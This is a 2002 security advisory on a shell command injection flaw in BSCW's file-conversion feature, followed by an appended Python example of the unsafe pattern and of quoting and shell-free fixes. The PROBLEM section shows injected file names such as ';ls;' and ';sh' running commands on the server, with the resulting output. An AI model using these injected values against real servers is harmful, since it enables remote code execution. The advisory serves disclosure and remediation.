4th Jan 2002 [SBWID-4970]
COMMAND
BSCW meta character escape allows script execution
SYSTEMS AFFECTED
All 3.x versions of BSCW running under a Unix-like OS.
Version 4 not tested (probably vulnerable too. Edit: the bug has been fixed
in the 21 Dec. Version 4 release).
Depending on how external programs are called under Windows, a similar
vulnerability may exist in BSCW for Windows.
PROBLEM
Thomas Seliger reported:
The BSCW system gives the users the possibility to convert files into
other formats (e.g. GIF into JPEG). This is done by calling external
tools. The user can enter the filename of the converted file. Since the
user input is handed as parameter to the external programs, which are
called via a shell, shell meta characters should be filtered out of the
user input. Most of them are filtered by BSCW, but there are a few
which aren't:
&;^()[]{}
The dangerous characters are "&", ";", "^". I'll explain the
vulnerability, using the conversion of a JPEG to a GIF as example:
After you have set your skill level in your user profile to "Expert",
you have the ability to convert certain file formats into another
format. BSCW achieves this by calling external helper tools.
Let's say we have a file "test.jpg" in a folder we can access. We
click on the "convert" option. In the following dialog we choose our
settings for the conversion; we select "GIF" and "no encoding". We
can also enter the name of the output file; the default is the name
of the file ("test.jpg" in our case). We don't change the name.
Hitting the convert button gives you a file named "test.gif".
Now we enter some shell meta characters as file name:
"'`/\|<>*?&;^()[]{}
And get output similar to this:
Some text that the conversion wasn't successful.
(
/bin/X11/djpeg -gif -outfile /BSCW/Tmp/@8279_1/&;^()[]{}
/BSCW/Tmp/@8279_1/@8279_2
) 2>&1
.
This is the output of the shell call which the BSCW system did. Looking
at the metachars you can see that "'`\|<>*? are filtered, while
&;^()[]{} are not. The @8279_1 and @8279_2 are internal object
reference codes that BSCW creates. Now we use ;ls; as file name for the
conversion (; is the command separator for shell commands), we get
something like:
/bin/X11/djpeg: can't open /BSCW/Tmp/@8558_1/
@8558_2
sh: /BSCW/Tmp/@8558_1/@8558_2: cannot execute
(
/bin/X11/djpeg -gif -outfile /BSCW/Tmp/@8558_1/;ls;
/BSCW/Tmp/@8558_1/@8558_2
) 2>&1
.
We executed the "ls" command (output is "/BSCW/@8558_1/@8558_2").
So there is one file in this temporary directory, which is in fact our
"test.jpg" file. Then we get the "cannot execute" error, since the
shell tries to execute "/BSCW/Tmp/@8558_1/@8558_2" (we separated it
in the command line by ";").
Now we create our exploit shell script:
echo code executed on webserver
uname -a
We use "test.jpg" as name for this script and upload it to the BSCW
server, setting the MIME type to "jpeg" manually in the upload
dialog. Since BSCW creates the temp file for conversion without the
exec bit set, we have to execute it by calling the shell with the file as
argument. We do this by giving ";sh" as file name for the converted
file:
/bin/X11/djpeg: can't open /BSCW/Tmp/@9586_1/
code executed on bscw server:
SunOS marin 5.8 Generic_111848-01 sun4u sparc SUNW,Ultra-4
(
/bin/X11/djpeg -gif -outfile /BSCW/Tmp/@9586_1/;
sh /BSCW/Tmp/@9586_1/@9586_2
) 2>&1
.
SOLUTION
The configuration for calling external conversion programs is in the
file "config_converters.py", located in the "/src" directory of
your BSCW installation. It contains one entry for each conversion
possibility (gif->jpeg, jpeg->gif, gif->ps ...). Those entries look
like this:
# JPEG -> GIF (0.8)
('image/jpeg', 'image/gif', '0.8',
'/usr/bin/X11/djpeg -gif -outfile %(dest)s %(src)s',
'Colors, if more than 256'),
Change it to:
# JPEG -> GIF (0.8)
('image/jpeg', 'image/gif', '0.8',
'/usr/bin/X11/djpeg -gif -outfile "%(dest)s" "%(src)s"',
'Colors, if more than 256'),
Do this for all the conversion programs. That way parameters are quoted
and not interpreted.
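The following Python example is added here to illustrate both the command-construction flaw described in the PROBLEM section and the quoting fix given in the SOLUTION section; it is not code from the advisory or from BSCW. It takes the page's djpeg command template as a sample entry, shows the string that results when an unfiltered file name such as ";ls;" is spliced in (the string is only returned, never run), then shows the advisory's quoting fix in its general form using shlex.quote(), an allowlist check on the user-chosen output name, and the stronger hardening of running the converter as an argument vector with no shell at all. The temp paths, the use of /bin/echo as a stand-in for djpeg, and the allowlist pattern are assumptions made for the demonstration.

```python
import re
import shlex
import subprocess

# Converter command template as shown in the page's config_converters.py entry.
# BSCW expands it with "%" formatting and then runs the result through a shell.
DJPEG_TEMPLATE = "/usr/bin/X11/djpeg -gif -outfile %(dest)s %(src)s"

# Characters the report says BSCW does NOT filter from the output file name.
UNFILTERED = "&;^()[]{}"


def build_shell_command(template, dest, src):
    """The unsafe pattern: user input is spliced into a single shell string.
    The result is returned for inspection only and is never executed here."""
    return template % {"dest": dest, "src": src}


def build_shell_command_quoted(template, dest, src):
    """The advisory's fix in its general form. shlex.quote() wraps any value
    that contains shell metacharacters in single quotes, so the shell hands it
    to the converter as one literal argument instead of parsing it."""
    return template % {"dest": shlex.quote(dest), "src": shlex.quote(src)}


# Allowlist (an assumption, not BSCW's rule) for the user-chosen output name:
# a plain file name only, no path separators, no leading dot, no metacharacters.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,254}$")


def is_safe_output_name(name):
    """True only if the name matches the allowlist; rejecting rather than
    filtering means a new metacharacter cannot slip through a blacklist."""
    return SAFE_NAME.match(name) is not None


def run_converter_argv(argv_template, dest, src):
    """Hardened form: expand each argv element separately and execute the
    program without a shell, so no character in dest or src is interpreted.
    Returns the program's stdout."""
    subs = {"dest": dest, "src": src}
    argv = [part % subs for part in argv_template]
    result = subprocess.run(argv, shell=False, capture_output=True,
                            text=True, check=False)
    return result.stdout


if __name__ == "__main__":
    # Constructed sample values; the temp-dir layout follows the page's /BSCW/Tmp/@id example.
    src = "/BSCW/Tmp/@0000_1/@0000_2"
    evil = ";ls;"  # the separator the report demonstrates
    print(build_shell_command(DJPEG_TEMPLATE, "/BSCW/Tmp/@0000_1/" + evil, src))
    print(build_shell_command_quoted(DJPEG_TEMPLATE, "/BSCW/Tmp/@0000_1/" + evil, src))
    print(is_safe_output_name("test.gif"), is_safe_output_name(evil))
    # echo stands in for djpeg so the demo runs on any system; ";ls;" is
    # printed back as a literal argument and nothing else is executed.
    print(run_converter_argv(["echo", "-outfile", "%(dest)s", "%(src)s"], evil, src))
```

Quoting with double quotes, as the advisory suggests, stops the characters the report lists from being interpreted, but it still relies on a shell parsing the command line; passing an argument vector directly to the converter removes the shell from the path entirely and is the form to prefer where the calling code can be changed.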